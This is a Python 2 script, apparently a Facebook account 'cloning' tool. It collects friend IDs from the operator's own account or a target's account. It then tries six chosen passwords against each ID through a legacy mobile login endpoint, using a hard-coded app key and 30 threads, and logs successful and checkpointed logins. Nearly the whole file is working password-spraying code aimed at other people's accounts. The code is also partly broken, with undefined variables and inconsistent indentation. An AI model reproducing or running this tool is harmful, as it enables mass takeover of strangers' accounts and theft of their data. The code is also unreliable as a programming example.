#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')] 


def keluar():
	print "\033[1;96m[!] \x1b[1;91mBee Happy "
	os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)


#### LOGO ####
logo = """
   \033[031m   _________________      _____   .___ 
   \033[031m  /   _____/\_____  \    /     \  |   |
   \033[032m  \_____  \  /   |   \  /  \ /  \ |   |
   \033[032m  /        \/    |    \/    Y    \|   |
   \033[033m /_______  /\_______  /\____|__  /|___|
   \033[033m         \/         \/         \/      
   \033[1;92m═══════════════════════════════════════
"""
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;92mLoading \x1b[1;95m"+o),;sys.stdout.flush();time.sleep(1)
back=0
successfull=[]
checkpoint=[]
oks=[]
cps=[]
id=[]


os.system("clear")
def tlogin():
	
	os.system('clear')
	print logo
	print "\033[1;92m1> \033[1;97mLogin With ID/Password."
	print "\033[1;92m2> \033[1;97mLogin Using Token."
	print "\033[1;92m0> \033[1;97mStop process"
	print ('      ')
	hos = raw_input("\n >>  ")
	if hos =="":
		print"[!]  Wrong Input"
		exit()
	elif hos =="1":
		login()
	elif hos =="2":
		os.system('clear')
		print logo
		hosp = raw_input("\033[1;97m[\033[1;92m+\033[1;97m] Enter Token ⋗⋗ ")
		tik()
		hopa = open('login.txt','w')
		hopa.write(hosp)
		hopa.close()
		print "\n\033[1;97m[\033[1;92m+\033[1;97m] Logged In Successfully."
		time.sleep(1)
		os.system('xdg-open https://chat.whatsapp.com/DT9eB2QOpXnKU3WNkzuilU')
		menu()
		
	elif hos =="0":
		exit()
	else:
		print"[!] Wrong Input"
		exit()
def login():
	os.system("clear")
	try:
		tb=open('login.txt', 'r')
		os.system("python2 flow.py")
	except (KeyError,IOError):
		os.system("clear")
		print logo
		
		jalan('\033[1;97m[\033[1;91m!\033[1;97m] Use a New Facebook Account To Login')
		print('\033[1;93m⊰\033[1;91m═════════════════════════════════════════════\033[1;93m⊱')
		iid=raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Number/Email: ')
		id=iid.replace(" ","")
		pwd=raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Password : ')
		tik()
		data = br.open("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email="+(id)+"&locale=en_US&password="+(pwd)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
		z=json.load(data)
		if 'access_token' in z:
		    st = open("login.txt", "w")
		    st.write(z["access_token"])
		    st.close()
		    print "\n[✓] Logged In Successfully."
		    time.sleep(1)
		    os.system('xdg-open https://chat.whatsapp.com/DT9eB2QOpXnKU3WNkzuilU')
		    os.system("clear")
		    menu()
		else:
		    if "www.facebook.com" in z["error_msg"]:
		        print ('[!] User Must Verify Account Before Login.')
		        time.sleep(3)
		        login()
		    else:
		        print ('[!] Number/User Id/ Password Is Wrong !')
		        time.sleep(1)
		        login()

def menu():
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		os.system('clear')
		print"\x1b[1;91m[!] Token invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
		ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
		b = json.loads(ots.text)
		sub = str(b['summary']['total_count'])
	except KeyError:
		os.system('clear')
		print"\033[1;91mYour Account is on Checkpoint"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	except requests.exceptions.ConnectionError:
		print"\x1b[1;92mThere is no internet connection"
		keluar()
	os.system("clear")
	print logo
	print "\033[1;36;40m      ╔═════════════════════════════════╗"
	print "\033[1;36;40m      ║\033[1;37;40m[\033[1;91m*\033[1;97m] Name\033[1;30;40m: "+nama+"  	   \033[1;36;40m║"                               
	print "\033[1;36;40m      ║\033[1;37;40m[\033[1;91m*\033[1;97m] ID  \033[1;30;40m: "+id+"        \033[1;36;40m║"
	print "\033[1;36;40m      ║\033[1;37;40m[\033[1;91m*\033[1;97m] Subs\033[1;30;40m: "+sub+"                      \033[1;36;40m║"
	print "\033[1;36;40m      ╚═════════════════════════════════╝"
	print "     \033[1;93m 1> \033[1;97mStart Cloning Attack"	
	print "     \033[1;93m 0> \033[1;97mLogout"
	pilih()

def pilih():
	unikers = raw_input("\n\033[1;31;40m⋗ \033[1;35;40m")
	if unikers =="":
		print "\x1b[1;91mFill in correctly"
		pilih()
	elif unikers =="1":
		super()
	
	elif unikers =="0":
		jalan('Token Removed')
		os.system('rm -rf login.txt')
		keluar()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih()

def super():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('clear')
	print logo
	print "         \033[1;91m> \033[1;93m1.\x1b[1;97m> Clone Friend List"
	print "         \033[1;91m> \033[1;93m2.\x1b[1;97m> Clone Public Accounts "
	
	print "         \033[1;91m> \033[1;93m0.\033[1;97m> Back"
	pilih_super()

def pilih_super():
	peak = raw_input("\n⋗⋗ \033[1;95m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print('\033[1;93m⊰\033[1;91m═════════════════════════════════════════════\033[1;93m⊱')
		jalan('\033[1;97m[\033[1;92m+\033[1;97m] Getting IDs \033[1;91m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif peak =="2":
		
		os.system('clear')
		print logo
        
		idt = raw_input("\033[1;97m[\033[1;92m+\033[1;97m] Enter ID\033[1;97m: \033[1;90m")
		print('\033[1;93m⊰\033[1;91m═════════════════════════════════════════════\033[1;93m⊱')
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;97m[\033[1;92m✓\033[1;97m] ID Name\033[1;97m:\033[1;90m "+op["name"]
		except KeyError:
			print"\x1b[1;91mID Not Found!"
			raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
			super()
		
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="2":
		manual()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;97m[\033[1;92m+\033[1;97m] Total Account : \033[1;90m"+str(len(id))
	print('\033[1;93m⊰\033[1;96m═════════════════════════════════════════════\033[1;93m⊱')
	print "\n\033[1;93m         \x1b[3;91mTo Stop Process Press CTRL+Z \033[1;0m    "
	print('\033[1;93m⊰\033[1;96m═════════════════════════════════════════════\033[1;93m⊱')
    ps1 = raw_input("Password ⋗⋗ \033[1;95m")
    ps2 = raw_input("Password ⋗⋗ \033[1;95m")
    ps3 = raw_input("Password ⋗⋗ \033[1;95m")
    ps4 = raw_input("Password ⋗⋗ \033[1;95m")
    ps5 = raw_input("Password ⋗⋗ \033[1;95m")
    ps6 = raw_input("Password ⋗⋗ \033[1;95m")
	def main(arg):
		global cps,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:
			h=requests.get('https://graph.facebook.com/'+user+'/?access_token='+tb)
			j=json.loads(h.text)
			ps1= ps1
			dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps1)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			k=json.load(dt)
			if 'www.facebook.com' in k['error_msg']:
			    print(S+'[CP] ≻≻≻ '+user+' ≻≻≻ '+ps1)
			    cps.append(user+ps1)
			else:
			    if 'access_token' in k:
			        print (G+'[OK] ≻≻≻ '+user+' ≻≻≻ '+ps1)
			        oks.append(user+ps1)
			    else:
			        ps2= ps2
			        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps2)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			        k=json.load(dt)
			        if 'www.facebook.com' in k['error_msg']:
			            print(S+'[CP] ≻≻≻ '+user+' ≻≻≻ '+ps2)
			            cps.append(user+ps2)
			        else:
			            if 'access_token' in k:
			                print(G+'[OK] ≻≻≻ '+user+' ≻≻≻ '+ps2)
			                oks.append(user+ps2)
			            else:
			                ps3= ps3
			                dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps3)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                k=json.load(dt)
			                if 'www.facebook.com' in k['error_msg']:
			                    print(S+'[CP] ≻≻≻ '+user+' ≻≻≻ '+ps3)
			                    cps.append(user+ps3)
			                else:
			                    if 'access_token' in k:
			                        print(G+'[OK] ≻≻≻ '+user+' ≻≻≻ '+ps3)
			                        oks.append(user+ps3)
			                    else:
			                        ps4= ps4
			                        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps4)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                        k=json.load(dt)
			                        if 'www.facebook.com' in k['error_msg']:
			                            print(S+'[CP] ≻≻≻ '+user+' ≻≻≻ '+ps4)
			                            cps.append(user+ps4)
			                        else:
			                            if 'access_token' in k:
			                                print(G+'[OK] ≻≻≻ '+user+' ≻≻≻ '+ps4)
			                                oks.append(user+ps4)
			                            else:
			                                ps5= ps5
			                                dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps5)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                                k=json.load(dt)
			                                if 'www.facebook.com' in k['error_msg']:
			                                    print(S+'[CP] ≻≻≻ '+user+' ≻≻≻ '+ps5)
			                                    cps.append(user+ps5)
			                                else:
			                                    if 'access_token' in k:
			                                        print(G+'[OK] ≻≻≻ '+user+' ≻≻≻ '+ps5)
			                                        oks.append(user+ps5)
			                                    else:
			                                        ps6= ps6
			                                        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps6)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                                        k=json.load(dt)
			                                        if 'www.facebook.com' in k['error_msg']:
			                                            print(S+'[CP] ≻≻≻ '+user+' ≻≻≻ '+ps6)
			                                            cps.append(user+ps6)
			                                        else:
			                                            if 'access_token' in k:
			                                                print(G+'[OK] ≻≻≻ '+user+' ≻≻≻ '+ps6)
			                                                oks.append(user+ps6)
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print 42*"\033[1;96m="
	print"\033[1;96m\033[1;97m[\033[1;92m+\033[1;97m] \033[1;92mTotal OK \033[1;97m[\033[1;92m+\033[1;97m]Total CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cps))
	raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
	
	menu()
if __name__=='__main__':
        tlogin()

